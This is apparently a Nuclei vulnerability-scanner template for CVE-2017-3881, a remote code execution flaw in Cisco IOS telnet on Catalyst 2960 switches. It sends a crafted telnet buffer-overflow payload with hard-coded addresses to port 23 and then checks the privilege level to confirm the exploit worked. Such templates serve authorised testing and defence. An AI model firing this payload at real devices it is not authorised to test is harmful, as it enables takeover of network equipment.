nuclei-templates/cves/2017/CVE-2017-3881.yaml

31 lines
1.3 KiB
YAML

id: CVE-2017-3881
info:
name: Cisco IOS 12.2(55)SE11 Remote Code Execution
author: dwisiswant0
severity: critical
reference:
- https://github.com/artkond/cisco-rce
- https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent.
tags: cve,cve2017,cisco,rce,network
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2017-3881
cwe-id: CWE-20
network:
- inputs:
- data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"
read: 1024
- data: "show priv"
read: 1024
host:
- "{{Hostname}}:23"
read-size: 1024
matchers:
- type: word
words:
- "Current privilege level is"